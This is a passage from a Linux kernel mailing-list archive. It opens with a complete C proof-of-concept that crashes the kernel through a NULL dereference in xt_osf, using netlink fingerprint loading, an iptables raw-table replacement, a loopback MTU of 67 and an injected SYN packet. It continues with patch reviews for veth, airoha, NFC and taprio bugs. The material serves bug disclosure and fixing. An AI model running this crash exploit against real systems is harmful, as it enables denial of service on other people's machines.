#define NFNETLINK_V0 0
#define NFNL_SUBSYS_OSF 5
#define NLM_F_REQUEST 0x0001
#define NLM_F_ACK 0x0004
#define NLM_F_CREATE 0x0400
#define NLMSG_ALIGNTO 4
#define NLMSG_ALIGN(len) (((len)+NLMSG_ALIGNTO-1) & ~(NLMSG_ALIGNTO-1))
#define NLMSG_HDRLEN ((int)NLMSG_ALIGN(sizeof(struct nlmsghdr)))
#define NLMSG_LENGTH(len) ((len) + NLMSG_HDRLEN)
#define NLA_ALIGNTO 4
#define NLA_ALIGN(len) (((len)+NLA_ALIGNTO-1) & ~(NLA_ALIGNTO-1))
#define NLA_HDRLEN ((int)NLA_ALIGN(sizeof(struct nlattr)))
#define NLMSG_ERROR 0x2
struct nfgenmsg {
__u8 nfgen_family;
__u8 version;
__be16 res_id;
};
/* OSF netlink */
#define OSF_MSG_ADD 0
#define OSF_ATTR_FINGER 1
#define MAXGENRELEN 32
#define MAX_IPOPTLEN 40
#define OSF_WSS_PLAIN 0
struct nf_osf_wc {
__u32 wc;
__u32 val;
};
struct nf_osf_opt {
__u16 kind;
__u16 length;
struct nf_osf_wc wc;
};
struct nf_osf_user_finger {
struct nf_osf_wc wss;
__u8 ttl;
__u8 df;
__u16 ss;
__u16 mss;
__u16 opt_num;
char genre[MAXGENRELEN];
char version[MAXGENRELEN];
char subtype[MAXGENRELEN];
struct nf_osf_opt opt[MAX_IPOPTLEN];
};
/* iptables / x_tables */
#define XT_TABLE_MAXNAMELEN 32
#define XT_EXTENSION_MAXNAMELEN 29
#define XT_FUNCTION_MAXNAMELEN 30
#define NF_INET_PRE_ROUTING 0
#define NF_INET_LOCAL_OUT 3
#define NF_INET_NUMHOOKS 5
#define NF_ACCEPT 1
#define IPPROTO_TCP 6
#define IPT_SO_SET_REPLACE 64
#define IPT_SO_GET_INFO 64
#define SOL_IP 0
/* XT_ALIGN: align to 8 bytes (alignof struct with u64 member) */
#define XT_ALIGN(s) (((s) + 7) & ~7)
struct xt_counters {
__u64 pcnt, bcnt;
};
struct ipt_ip {
struct in_addr src, dst;
struct in_addr smsk, dmsk;
char iniface[16], outiface[16];
unsigned char iniface_mask[16], outiface_mask[16];
__u16 proto;
__u8 flags;
__u8 invflags;
};
struct ipt_entry {
struct ipt_ip ip;
unsigned int nfcache;
__u16 target_offset;
__u16 next_offset;
unsigned int comefrom;
struct xt_counters counters;
unsigned char elems[0];
};
struct xt_entry_match {
union {
struct {
__u16 match_size;
char name[XT_EXTENSION_MAXNAMELEN];
__u8 revision;
} user;
__u16 match_size;
} u;
unsigned char data[0];
};
struct xt_entry_target {
union {
struct {
__u16 target_size;
char name[XT_EXTENSION_MAXNAMELEN];
__u8 revision;
} user;
__u16 target_size;
} u;
unsigned char data[0];
};
struct xt_standard_target {
struct xt_entry_target target;
int verdict;
};
struct xt_error_target {
struct xt_entry_target target;
char errorname[XT_FUNCTION_MAXNAMELEN];
};
struct ipt_getinfo {
char name[XT_TABLE_MAXNAMELEN];
unsigned int valid_hooks;
unsigned int hook_entry[NF_INET_NUMHOOKS];
unsigned int underflow[NF_INET_NUMHOOKS];
unsigned int num_entries;
unsigned int size;
};
struct ipt_replace {
char name[XT_TABLE_MAXNAMELEN];
unsigned int valid_hooks;
unsigned int num_entries;
unsigned int size;
unsigned int hook_entry[NF_INET_NUMHOOKS];
unsigned int underflow[NF_INET_NUMHOOKS];
unsigned int num_counters;
struct xt_counters *counters;
/* entries follow */
};
/* nf_osf_info — iptables match data for xt_osf */
#define NF_OSF_GENRE (1 << 0)
#define NF_OSF_TTL_FLAG (1 << 1) /* NF_OSF_TTL in the kernel */
#define NF_OSF_TTL_LESS 1
struct nf_osf_info {
char genre[MAXGENRELEN];
__u32 len;
__u32 flags;
__u32 loglevel;
__u32 ttl;
};
/* IP / TCP headers for packet crafting */
struct iphdr {
#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
__u8 ihl:4, version:4;
#else
__u8 version:4, ihl:4;
#endif
__u8 tos;
__u16 tot_len;
__u16 id;
__u16 frag_off;
__u8 ttl;
__u8 protocol;
__u16 check;
__u32 saddr;
__u32 daddr;
};
struct tcphdr {
__u16 source;
__u16 dest;
__u32 seq;
__u32 ack_seq;
#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
__u16 res1:4, doff:4, fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1;
#else
__u16 doff:4, res1:4, cwr:1, ece:1, urg:1, ack:1, psh:1, rst:1, syn:1, fin:1;
#endif
__u16 window;
__u16 check;
__u16 urg_ptr;
};
/* AF_PACKET / Ethernet */
#ifndef AF_PACKET
#define AF_PACKET 17
#endif
#define ETH_P_IP 0x0800
#define ETH_P_ALL 0x0003
#define ETH_HLEN 14
#define ETH_ALEN 6
struct sockaddr_ll {
unsigned short sll_family;
__be16 sll_protocol;
int sll_ifindex;
unsigned short sll_hatype;
unsigned char sll_pkttype;
unsigned char sll_halen;
unsigned char sll_addr[8];
};
/* ------------------------------------------------------------------ */
/* Helpers */
/* ------------------------------------------------------------------ */
#define DIE(fmt, ...) do { \
fprintf(stderr, "[-] " fmt "\n", ##__VA_ARGS__); \
exit(1); \
} while (0)
#define LOG(fmt, ...) fprintf(stderr, "[*] " fmt "\n", ##__VA_ARGS__)
static __u16 ip_checksum(const void *buf, int len)
{
const __u16 *p = buf;
__u32 sum = 0;
while (len > 1) {
sum += *p++;
len -= 2;
}
if (len == 1)
sum += *(__u8 *)p;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (__u16)~sum;
}
/* ------------------------------------------------------------------ */
/* Step 1: Load OSF fingerprint via nfnetlink */
/* ------------------------------------------------------------------ */
static void load_osf_fingerprint(void)
{
int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER);
if (fd < 0)
DIE("socket(NETLINK_NETFILTER): %s", strerror(errno));
struct sockaddr_nl addr = { .nl_family = AF_NETLINK };
if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0)
DIE("bind(netlink): %s", strerror(errno));
struct nf_osf_user_finger finger;
memset(&finger, 0, sizeof(finger));
finger.wss.wc = OSF_WSS_PLAIN;
finger.wss.val = 0;
finger.ttl = 64;
finger.df = 0;
finger.ss = 40;
finger.mss = 0;
finger.opt_num = 0;
strncpy(finger.genre, "Linux", MAXGENRELEN);
int finger_attr_len = NLA_HDRLEN + sizeof(finger);
int nfmsg_len = NLMSG_ALIGN(sizeof(struct nfgenmsg)) + NLA_ALIGN(finger_attr_len);
int total_len = NLMSG_LENGTH(nfmsg_len);
char *buf = calloc(1, total_len);
if (!buf) DIE("calloc");
struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
nlh->nlmsg_len = total_len;
nlh->nlmsg_type = (NFNL_SUBSYS_OSF << 8) | OSF_MSG_ADD;
nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_ACK;
nlh->nlmsg_seq = 1;
nlh->nlmsg_pid = getpid();
struct nfgenmsg *nfg = (struct nfgenmsg *)(buf + NLMSG_HDRLEN);
nfg->nfgen_family = AF_UNSPEC;
nfg->version = NFNETLINK_V0;
nfg->res_id = 0;
struct nlattr *nla = (struct nlattr *)(buf + NLMSG_HDRLEN +
NLMSG_ALIGN(sizeof(struct nfgenmsg)));
nla->nla_len = finger_attr_len;
nla->nla_type = OSF_ATTR_FINGER;
memcpy((char *)nla + NLA_HDRLEN, &finger, sizeof(finger));
struct sockaddr_nl dest = { .nl_family = AF_NETLINK };
if (sendto(fd, buf, total_len, 0,
(struct sockaddr *)&dest, sizeof(dest)) < 0)
DIE("sendto(OSF_MSG_ADD): %s", strerror(errno));
char rbuf[4096];
int n = recv(fd, rbuf, sizeof(rbuf), 0);
if (n < 0)
DIE("recv(netlink): %s", strerror(errno));
struct nlmsghdr *rnlh = (struct nlmsghdr *)rbuf;
if (rnlh->nlmsg_type == NLMSG_ERROR) {
int *errp = (int *)(rbuf + NLMSG_HDRLEN);
if (*errp != 0)
DIE("OSF fingerprint load failed: %s (err=%d)",
strerror(-*errp), *errp);
}
LOG("OSF fingerprint loaded (genre=Linux, ttl=64, ss=40, df=0)");
free(buf);
close(fd);
}
/* ------------------------------------------------------------------ */
/* Step 2: Set up iptables raw table with xt_osf match */
/* ------------------------------------------------------------------ */
#define SIZEOF_IPT_ENTRY (XT_ALIGN(sizeof(struct ipt_entry)))
#define SIZEOF_MATCH_OSF (XT_ALIGN(sizeof(struct xt_entry_match) + sizeof(struct nf_osf_info)))
#define SIZEOF_STD_TARGET (XT_ALIGN(sizeof(struct xt_standard_target)))
#define SIZEOF_ERR_TARGET (XT_ALIGN(sizeof(struct xt_error_target)))
#define ENTRY0_SIZE (SIZEOF_IPT_ENTRY + SIZEOF_MATCH_OSF + SIZEOF_STD_TARGET)
#define ENTRY1_SIZE (SIZEOF_IPT_ENTRY + SIZEOF_STD_TARGET)
#define ENTRY2_SIZE (SIZEOF_IPT_ENTRY + SIZEOF_STD_TARGET)
#define ENTRY3_SIZE (SIZEOF_IPT_ENTRY + SIZEOF_ERR_TARGET)
#define ENTRIES_SIZE (ENTRY0_SIZE + ENTRY1_SIZE + ENTRY2_SIZE + ENTRY3_SIZE)
static void setup_iptables_osf(void)
{
int rawfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (rawfd < 0)
DIE("socket(RAW): %s", strerror(errno));
struct ipt_getinfo info;
memset(&info, 0, sizeof(info));
strncpy(info.name, "raw", XT_TABLE_MAXNAMELEN);
socklen_t optlen = sizeof(info);
if (getsockopt(rawfd, SOL_IP, IPT_SO_GET_INFO, &info, &optlen) < 0)
DIE("getsockopt(IPT_SO_GET_INFO): %s", strerror(errno));
LOG("raw table: valid_hooks=0x%x, num_entries=%u, size=%u",
info.valid_hooks, info.num_entries, info.size);
unsigned int old_num_entries = info.num_entries;
size_t repl_size = sizeof(struct ipt_replace) + ENTRIES_SIZE;
char *blob = calloc(1, repl_size);
if (!blob) DIE("calloc");
struct ipt_replace *repl = (struct ipt_replace *)blob;
strncpy(repl->name, "raw", XT_TABLE_MAXNAMELEN);
repl->valid_hooks = (1 << NF_INET_PRE_ROUTING) | (1 << NF_INET_LOCAL_OUT);
repl->num_entries = 4;
repl->size = ENTRIES_SIZE;
unsigned int off0 = 0;
unsigned int off1 = ENTRY0_SIZE;
unsigned int off2 = ENTRY0_SIZE + ENTRY1_SIZE;
unsigned int off3 = ENTRY0_SIZE + ENTRY1_SIZE + ENTRY2_SIZE;
repl->hook_entry[NF_INET_PRE_ROUTING] = off0;
repl->hook_entry[NF_INET_LOCAL_OUT] = off2;
repl->underflow[NF_INET_PRE_ROUTING] = off1;
repl->underflow[NF_INET_LOCAL_OUT] = off2;
repl->num_counters = old_num_entries;
struct xt_counters *ctrs = calloc(old_num_entries, sizeof(struct xt_counters));
if (!ctrs) DIE("calloc counters");
repl->counters = ctrs;
char *entries = blob + sizeof(struct ipt_replace);
/* Entry 0: OSF match rule in PREROUTING */
{
struct ipt_entry *e = (struct ipt_entry *)(entries + off0);
memset(e, 0, SIZEOF_IPT_ENTRY);
e->ip.proto = IPPROTO_TCP;
e->target_offset = SIZEOF_IPT_ENTRY + SIZEOF_MATCH_OSF;
e->next_offset = ENTRY0_SIZE;
struct xt_entry_match *m = (struct xt_entry_match *)(entries + off0 + SIZEOF_IPT_ENTRY);
memset(m, 0, SIZEOF_MATCH_OSF);
m->u.user.match_size = SIZEOF_MATCH_OSF;
strncpy(m->u.user.name, "osf", XT_EXTENSION_MAXNAMELEN);
m->u.user.revision = 0;
struct nf_osf_info *osf = (struct nf_osf_info *)m->data;
memset(osf, 0, sizeof(*osf));
strncpy(osf->genre, "Linux", MAXGENRELEN);
osf->flags = NF_OSF_GENRE | NF_OSF_TTL_FLAG;
osf->ttl = NF_OSF_TTL_LESS;
struct xt_standard_target *t = (struct xt_standard_target *)
(entries + off0 + e->target_offset);
memset(t, 0, SIZEOF_STD_TARGET);
t->target.u.user.target_size = SIZEOF_STD_TARGET;
t->verdict = -NF_ACCEPT - 1;
}
/* Entry 1: PREROUTING policy (underflow) */
{
struct ipt_entry *e = (struct ipt_entry *)(entries + off1);
memset(e, 0, SIZEOF_IPT_ENTRY);
e->target_offset = SIZEOF_IPT_ENTRY;
e->next_offset = ENTRY1_SIZE;
struct xt_standard_target *t = (struct xt_standard_target *)
(entries + off1 + SIZEOF_IPT_ENTRY);
memset(t, 0, SIZEOF_STD_TARGET);
t->target.u.user.target_size = SIZEOF_STD_TARGET;
t->verdict = -NF_ACCEPT - 1;
}
/* Entry 2: OUTPUT policy (underflow) */
{
struct ipt_entry *e = (struct ipt_entry *)(entries + off2);
memset(e, 0, SIZEOF_IPT_ENTRY);
e->target_offset = SIZEOF_IPT_ENTRY;
e->next_offset = ENTRY2_SIZE;
struct xt_standard_target *t = (struct xt_standard_target *)
(entries + off2 + SIZEOF_IPT_ENTRY);
memset(t, 0, SIZEOF_STD_TARGET);
t->target.u.user.target_size = SIZEOF_STD_TARGET;
t->verdict = -NF_ACCEPT - 1;
}
/* Entry 3: ERROR target */
{
struct ipt_entry *e = (struct ipt_entry *)(entries + off3);
memset(e, 0, SIZEOF_IPT_ENTRY);
e->target_offset = SIZEOF_IPT_ENTRY;
e->next_offset = ENTRY3_SIZE;
struct xt_error_target *t = (struct xt_error_target *)
(entries + off3 + SIZEOF_IPT_ENTRY);
memset(t, 0, SIZEOF_ERR_TARGET);
t->target.u.user.target_size = SIZEOF_ERR_TARGET;
strncpy(t->target.u.user.name, "ERROR", XT_EXTENSION_MAXNAMELEN);
strncpy(t->errorname, "ERROR", XT_FUNCTION_MAXNAMELEN);
}
LOG("Replacing raw table: %u entries, %u bytes", repl->num_entries, repl->size);
if (setsockopt(rawfd, SOL_IP, IPT_SO_SET_REPLACE, blob, repl_size) < 0)
DIE("setsockopt(IPT_SO_SET_REPLACE): %s (errno=%d)",
strerror(errno), errno);
LOG("iptables raw table replaced with OSF match rule");
free(ctrs);
free(blob);
close(rawfd);
}
/* ------------------------------------------------------------------ */
/* Step 3: Destroy lo's in_dev via MTU trick */
/* ------------------------------------------------------------------ */
/*
* loopback driver (loopback.c) uses gen_lo_setup() which does NOT call
* ether_setup(), so dev->min_mtu stays at the default 0.
* This allows setting MTU below IPV4_MIN_MTU (68).
*
* Setting MTU to 67 triggers:
* NETDEV_CHANGEMTU → !inetdev_valid_mtu(67)
* → fallthrough → inetdev_destroy(in_dev)
* → RCU_INIT_POINTER(dev->ip_ptr, NULL)
*/
static void setup_loopback(void)
{
int sfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sfd < 0) DIE("socket(DGRAM): %s", strerror(errno));
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
ifr.ifr_mtu = 67;
if (ioctl(sfd, SIOCSIFMTU, &ifr) < 0)
DIE("ioctl(SIOCSIFMTU lo 67): %s", strerror(errno));
close(sfd);
LOG("lo: MTU set to 67 → inetdev_destroy → ip_ptr = NULL");
}
/* ------------------------------------------------------------------ */
/* Step 4: Inject crafted SYN packet via AF_PACKET on lo */
/* ------------------------------------------------------------------ */
static void inject_syn(void)
{
/*
* lo ifindex is always LOOPBACK_IFINDEX = 1,
* but we look it up to be safe.
*/
int sfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sfd < 0) DIE("socket(DGRAM): %s", strerror(errno));
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
if (ioctl(sfd, SIOCGIFINDEX, &ifr) < 0)
DIE("SIOCGIFINDEX(lo): %s", strerror(errno));
int ifindex = ifr.ifr_ifindex;
close(sfd);
LOG("lo: ifindex=%d", ifindex);
int pfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (pfd < 0)
DIE("socket(AF_PACKET): %s", strerror(errno));
/*
* 54-byte Ethernet frame: [14 ETH][20 IP][20 TCP]
*
* loopback_xmit() calls eth_type_trans(skb, dev) which:
* - Strips ETH header, sets skb->protocol from EtherType
* - Sets pkt_type based on DST MAC vs dev MAC
* - lo MAC = 00:00:00:00:00:00 → DST=all-zeros → PACKET_HOST
* Then calls __netif_rx(skb) → RX path → ip_rcv → PREROUTING.
*
* IP: TTL=255 > fingerprint TTL(64) → takes TTL_LESS path in nf_osf_ttl
* DF=0 → matches fingerprint df=0 → nf_osf_fingers[0]
* tot_len=40 → matches fingerprint ss=40
* TCP: SYN=1, doff=5, no options → matches opt_num=0
*/
char frame[54];
memset(frame, 0, sizeof(frame));
/* Ethernet header: DST=00:00:00:00:00:00 (lo MAC → PACKET_HOST) */
unsigned char *eth = (unsigned char *)frame;
/* DST already zero from memset */
eth[ETH_ALEN + 5] = 0x01; /* SRC: 00:00:00:00:00:01 */
eth[12] = (ETH_P_IP >> 8) & 0xff; /* EtherType: 0x0800 (IPv4) */
eth[13] = ETH_P_IP & 0xff;
/* IP header */
struct iphdr *ip = (struct iphdr *)(frame + ETH_HLEN);
ip->version = 4;
ip->ihl = 5;
ip->tot_len = htons(40);
ip->id = htons(0x1234);
ip->frag_off = 0; /* DF=0 */
ip->ttl = 255; /* > fingerprint TTL 64 */
ip->protocol = IPPROTO_TCP;
ip->saddr = inet_addr("10.0.0.2");
ip->daddr = inet_addr("10.0.0.1");
ip->check = 0;
ip->check = ip_checksum(ip, 20);
/* TCP header */
struct tcphdr *tcp = (struct tcphdr *)(frame + ETH_HLEN + 20);
tcp->source = htons(12345);
tcp->dest = htons(80);
tcp->seq = htonl(0xdeadbeef);
tcp->doff = 5; /* no TCP options */
tcp->syn = 1;
tcp->window = htons(1024);
LOG("Injecting SYN via lo: TTL=255, DF=0, tot_len=40, SYN");
LOG("Crash path: AF_PACKET → loopback_xmit → __netif_rx");
LOG(" → ip_rcv(lo) → NF_INET_PRE_ROUTING → xt_osf");
LOG(" → nf_osf_ttl: __in_dev_get_rcu(lo) = NULL → CRASH");
struct sockaddr_ll sll;
memset(&sll, 0, sizeof(sll));
sll.sll_family = AF_PACKET;
sll.sll_protocol = htons(ETH_P_IP);
sll.sll_ifindex = ifindex;
sll.sll_halen = ETH_ALEN;
/* sll_addr left as zeros (matching lo MAC) */
ssize_t n = sendto(pfd, frame, sizeof(frame), 0,
(struct sockaddr *)&sll, sizeof(sll));
if (n < 0)
DIE("sendto(AF_PACKET): %s", strerror(errno));
LOG("Packet injected (%zd bytes), waiting for kernel crash...", n);
close(pfd);
}
/* ------------------------------------------------------------------ */
/* main */
/* ------------------------------------------------------------------ */
int main(void)
{
LOG("=== nf_osf_ttl() NULL pointer dereference PoC ===");
LOG("Method: loopback MTU trick (MTU=67 < 68 → inetdev_destroy)");
/* Step 1: Load OSF fingerprint */
load_osf_fingerprint();
/* Step 2: Set up iptables raw table with OSF match */
setup_iptables_osf();
/* Step 3: Destroy lo's in_dev by setting MTU < IPV4_MIN_MTU */
setup_loopback();
/* Step 4: Inject SYN packet → triggers NULL deref */
inject_syn();
/* If we reach here, the bug didn't trigger */
sleep(3);
LOG("No crash detected — bug may be patched in this kernel.");
return 1;
}
```
^ permalink raw reply
* Re: [syzbot ci] Re: veth: add Byte Queue Limits (BQL) support
From: Aleksandr Nogikh @ 2026-04-14 8:33 UTC (permalink / raw)
To: syzbot+cib904ea9ebb647254, hawk
Cc: netdev, linux-kernel, syzkaller-bugs, syzbot
In-Reply-To: <69dd48c2.a00a0220.468cb.004e.GAE@google.com>
(forgotten to Cc the right list)
Hmm, just fixed a problem that may have affected `syz test` processing,
let's try again:
#syz test
---
drivers/net/veth.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/drivers/net/veth.c b/drivers/net/veth.c
index 911e7e36e166..9d7b085c9548 100644
--- a/drivers/net/veth.c
+++ b/drivers/net/veth.c
@@ -1138,7 +1138,9 @@ static void veth_napi_del_range(struct net_device
*dev, int start, int end)
*/
peer = rtnl_dereference(priv->peer);
if (peer) {
- for (i = start; i < end; i++)
+ int peer_end = min(end, (int)peer->real_num_tx_queues);
+
+ for (i = start; i < peer_end; i++)
netdev_tx_reset_queue(netdev_get_tx_queue(peer, i));
}
^ permalink raw reply related
* Re: [net-next] net: airoha: Wait for TX to complete in airoha_dev_stop()
From: Paolo Abeni @ 2026-04-14 8:29 UTC (permalink / raw)
To: lorenzo
Cc: edumazet, kuba, davem, netdev, andrew+netdev, pabeni,
linux-arm-kernel, linux-mediatek
In-Reply-To: <20260411-airoha-fix-ndo_stop-v1-1-caddaa181739@kernel.org>
This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
For local reproduction steps see https://netdev-ai.bots.linux.dev/ai-local.html
---
net: airoha: Wait for TX to complete in airoha_dev_stop()
Wait for TX to complete in airoha_dev_stop routine before stopping the
TX DMA and run airoha_qdma_cleanup_tx_queue routine. Moreover,
start/stop TX/RX NAPIs in ndo_open()/ndo_stop() callbacks in order to be
sure the TX NAPIs have completed before stopping the TX DMA engine in
airoha_dev_stop routine.
> diff --git a/drivers/net/ethernet/airoha/airoha_eth.c b/drivers/net/ethernet/airoha/airoha_eth.c
> index 8e4b043af4bc..9e40c8f375c1 100644
> --- a/drivers/net/ethernet/airoha/airoha_eth.c
> +++ b/drivers/net/ethernet/airoha/airoha_eth.c
[ ... ]
> @@ -1684,18 +1686,26 @@ static int airoha_dev_stop(struct net_device *dev)
> struct airoha_qdma *qdma = port->qdma;
> int i, err;
>
> - netif_tx_disable(dev);
> err = airoha_set_vip_for_gdm_port(port, false);
> if (err)
> return err;
>
> - for (i = 0; i < ARRAY_SIZE(qdma->q_tx); i++)
> - netdev_tx_reset_subqueue(dev, i);
> -
> airoha_set_gdm_port_fwd_cfg(qdma->eth, REG_GDM_FWD_CFG(port->id),
> FE_PSE_PORT_DROP);
>
> + netif_tx_disable(dev);
> if (atomic_dec_and_test(&qdma->users)) {
> + u32 val;
> +
> + /* Wait for TX to complete */
> + err = read_poll_timeout(airoha_qdma_rr, val,
> + !(val & GLOBAL_CFG_TX_DMA_BUSY_MASK),
> + USEC_PER_MSEC, 100 * USEC_PER_MSEC,
> + false, qdma, REG_QDMA_GLOBAL_CFG);
> + if (err)
> + return err;
> ^^^^^^^^^^
Can this leave the device in an inconsistent state? When read_poll_timeout()
fails (TX DMA busy for more than 100ms), airoha_dev_stop() returns an error
immediately. However, atomic_dec_and_test(&qdma->users) has already
decremented qdma->users to 0, but airoha_qdma_stop_napi() was never called,
so all NAPIs remain enabled.
The networking core (__dev_close_many in net/core/dev.c) ignores the
ndo_stop return value and marks the device as down regardless. When the
device is later brought up again, airoha_dev_open() sees atomic_fetch_inc()
return 0 (old value) and calls airoha_qdma_start_napi() -> napi_enable(),
which hits BUG_ON(!test_bit(NAPI_STATE_SCHED, &val)) in napi_enable_locked()
because the NAPI was never disabled.
The early return also skips the netdev_tx_reset_subqueue() calls at the end
of the function.
Should the code either continue with cleanup on timeout (don't return), or
ensure NAPI and DMA state are properly cleaned up before returning?
> +
> + airoha_qdma_stop_napi(qdma);
> airoha_qdma_clear(qdma, REG_QDMA_GLOBAL_CFG,
> GLOBAL_CFG_TX_DMA_EN_MASK |
> GLOBAL_CFG_RX_DMA_EN_MASK);
[ ... ]
^ permalink raw reply
* Re: [PATCH net v2 1/3] nfc: nci: fix u8 underflow in nci_store_general_bytes_nfc_dep
From: Simon Horman @ 2026-04-14 8:28 UTC (permalink / raw)
To: Lekë Hapçiu
Cc: netdev, davem, edumazet, kuba, pabeni, linux-nfc, stable,
Lekë Hapçiu
In-Reply-To: <20260409185958.1821242-2-snowwlake@icloud.com>
On Thu, Apr 09, 2026 at 08:59:56PM +0200, Lekë Hapçiu wrote:
> From: Lekë Hapçiu <framemain@outlook.com>
>
> nci_store_general_bytes_nfc_dep() computes the number of General Bytes
> to copy from an ATR_RES or ATR_REQ frame by subtracting a fixed header
> offset from the peer-supplied length field:
>
> ndev->remote_gb_len = min_t(__u8,
> (atr_res_len - NFC_ATR_RES_GT_OFFSET), /* offset = 15 */
> NFC_ATR_RES_GB_MAXSIZE);
>
> Both length fields are __u8. When a malicious NFC-DEP target (POLL mode)
> or initiator (LISTEN mode) sends an ATR_RES/ATR_REQ whose length field is
> smaller than the fixed offset (< 15 or < 14 respectively), the subtraction
> wraps in unsigned u8 arithmetic:
>
> e.g. atr_res_len = 0 -> (u8)(0 - 15) = 241
>
> min_t(__u8, 241, 47) then yields 47, so the subsequent memcpy reads
> 47 bytes from beyond the end of the valid activation parameter data into
> ndev->remote_gb[]. This buffer is later passed to nfc_llcp_parse_gb_tlv()
> as a TLV array, feeding directly into the TLV parser hardened by the
> companion patch.
>
> Fix: add an explicit lower-bound check on each length field before the
> subtraction. If the length is smaller than the required offset the frame
> is malformed; leave remote_gb_len at zero and skip the memcpy.
>
> Both the POLL (atr_res_len / NFC_ATR_RES_GT_OFFSET = 15) and the LISTEN
> (atr_req_len / NFC_ATR_REQ_GT_OFFSET = 14) paths are affected; both are
> fixed symmetrically.
>
> Reachability: the ATR_RES is sent by an NFC-DEP target during RF
> activation, before any authentication or pairing. The bug is therefore
> reachable from any NFC peer within ~4 cm.
>
> Fixes: a99903ec4566 ("NFC: NCI: Handle Target mode activation")
The above commit seems to move rather than add the logic in question.
It seems to me that the following would be the fixes tag corresponding
to the commit that introduced this problem.
Fixes: 767f19ae698e ("NFC: Implement NCI dep_link_up and dep_link_down")
> Cc: stable@vger.kernel.org
> Signed-off-by: Lekë Hapçiu <framemain@outlook.com>
> ---
> net/nfc/nci/ntf.c | 22 ++++++++++++++--------
> 1 file changed, 14 insertions(+), 8 deletions(-)
>
> diff --git a/net/nfc/nci/ntf.c b/net/nfc/nci/ntf.c
> index c96512bb8..8eb295580 100644
> --- a/net/nfc/nci/ntf.c
> +++ b/net/nfc/nci/ntf.c
> @@ -631,25 +631,31 @@ static int nci_store_general_bytes_nfc_dep(struct nci_dev *ndev,
> switch (ntf->activation_rf_tech_and_mode) {
> case NCI_NFC_A_PASSIVE_POLL_MODE:
> case NCI_NFC_F_PASSIVE_POLL_MODE:
> + if (ntf->activation_params.poll_nfc_dep.atr_res_len <
> + NFC_ATR_RES_GT_OFFSET)
> + break;
> ndev->remote_gb_len = min_t(__u8,
> - (ntf->activation_params.poll_nfc_dep.atr_res_len
> - - NFC_ATR_RES_GT_OFFSET),
> + ntf->activation_params.poll_nfc_dep.atr_res_len
> + - NFC_ATR_RES_GT_OFFSET,
> NFC_ATR_RES_GB_MAXSIZE);
I'm not suggesting changing this, at least not as part of this bug fix, so
this comment is FTR: As NFC_ATR_RES_GB_MAXSIZE is a compile time constant,
and the condition added by this patch ensures that the result of the
subtraction is not negative, I strongly suspect that using min() here
sufficient and thus more appropriate than min_t().
> memcpy(ndev->remote_gb,
> - (ntf->activation_params.poll_nfc_dep.atr_res
> - + NFC_ATR_RES_GT_OFFSET),
> + ntf->activation_params.poll_nfc_dep.atr_res
> + + NFC_ATR_RES_GT_OFFSET,
> ndev->remote_gb_len);
> break;
>
> case NCI_NFC_A_PASSIVE_LISTEN_MODE:
> case NCI_NFC_F_PASSIVE_LISTEN_MODE:
> + if (ntf->activation_params.listen_nfc_dep.atr_req_len <
> + NFC_ATR_REQ_GT_OFFSET)
> + break;
> ndev->remote_gb_len = min_t(__u8,
> - (ntf->activation_params.listen_nfc_dep.atr_req_len
> - - NFC_ATR_REQ_GT_OFFSET),
> + ntf->activation_params.listen_nfc_dep.atr_req_len
> + - NFC_ATR_REQ_GT_OFFSET,
> NFC_ATR_REQ_GB_MAXSIZE);
> memcpy(ndev->remote_gb,
> - (ntf->activation_params.listen_nfc_dep.atr_req
> - + NFC_ATR_REQ_GT_OFFSET),
> + ntf->activation_params.listen_nfc_dep.atr_req
> + + NFC_ATR_REQ_GT_OFFSET,
> ndev->remote_gb_len);
> break;
>
> --
> 2.51.0
>
^ permalink raw reply
* Re: [PATCH net v2] net/sched: taprio: fix NULL pointer dereference in class dump
From: Weiming Shi @ 2026-04-14 8:28 UTC (permalink / raw)
To: Paolo Abeni
Cc: Vinicius Costa Gomes, Jamal Hadi Salim, Jiri Pirko,
David S . Miller, Eric Dumazet, Jakub Kicinski, Simon Horman,
Vladimir Oltean, netdev, linux-kernel, Xiang Mei
In-Reply-To: <6f4ebd09-9fa9-4b6e-97b5-a6b1fcec8774@redhat.com>
On 26-04-14 10:16, Paolo Abeni wrote:
> On 4/10/26 5:39 PM, Weiming Shi wrote:
> > When a TAPRIO child qdisc is deleted via RTM_DELQDISC, taprio_graft()
> > is called with new == NULL and stores NULL into q->qdiscs[cl - 1].
> > Subsequent RTM_GETTCLASS dump operations walk all classes via
> > taprio_walk() and call taprio_dump_class(), which calls taprio_leaf()
> > returning the NULL pointer, then dereferences it to read child->handle,
> > causing a kernel NULL pointer dereference.
> >
> > The bug is reachable with namespace-scoped CAP_NET_ADMIN on any kernel
> > with CONFIG_NET_SCH_TAPRIO enabled. On systems with unprivileged user
> > namespaces enabled, an unprivileged local user can trigger a kernel
> > panic by creating a taprio qdisc inside a new network namespace,
> > grafting an explicit child qdisc, deleting it, and requesting a class
> > dump. The RTM_GETTCLASS dump itself requires no capability.
> >
> > Oops: general protection fault, probably for non-canonical address 0xdffffc0000000007: 0000 [#1] SMP KASAN NOPTI
> > KASAN: null-ptr-deref in range [0x0000000000000038-0x000000000000003f]
> > RIP: 0010:taprio_dump_class (net/sched/sch_taprio.c:2475)
> > Call Trace:
> > <TASK>
> > tc_fill_tclass (net/sched/sch_api.c:1966)
> > qdisc_class_dump (net/sched/sch_api.c:2329)
> > taprio_walk (net/sched/sch_taprio.c:2510)
> > tc_dump_tclass_qdisc (net/sched/sch_api.c:2353)
